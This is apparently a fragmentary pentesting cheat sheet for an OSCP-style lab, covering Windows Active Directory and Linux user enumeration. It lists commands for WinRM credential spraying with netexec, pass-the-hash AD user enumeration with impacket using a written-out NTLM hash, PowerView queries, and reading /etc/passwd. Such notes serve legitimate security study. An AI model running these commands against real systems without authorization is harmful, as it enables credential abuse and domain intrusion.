wmic computersystem get domain
nslookup NAME
netexec winrm -u test -p test --continue-on-success $(cat host-dmz.txt)
# Always do this if possible
Get-NetUser | select samaccountname,useraccountcontrol,ServicePrincipalName
# Else
## w/ PtH
impacket-GetADUsers -all -dc-ip 10.10.121.140 -hashes :e728ecbadfb02f51ce8eed753f3ff3fd oscp.exam/celia.almeda
## w/ Password
impacket-GetADUsers -all -dc-ip 10.10.121.140 oscp.exam/celia.almeda:PASS
user:
→ “Member Of”user:
→ “Local Admin Privileges”Pwn3d!
displayed in crackmapexec.\\PsLoggedon.exe -accepteula \\\\HOST
user:
→ “Execution Privileges”useraccountcontrol
columnWindows
Get-LocalUser
(only Enabled)net user NAME
Linux
cat /etc/passwd
(only remarkable ones)id NAME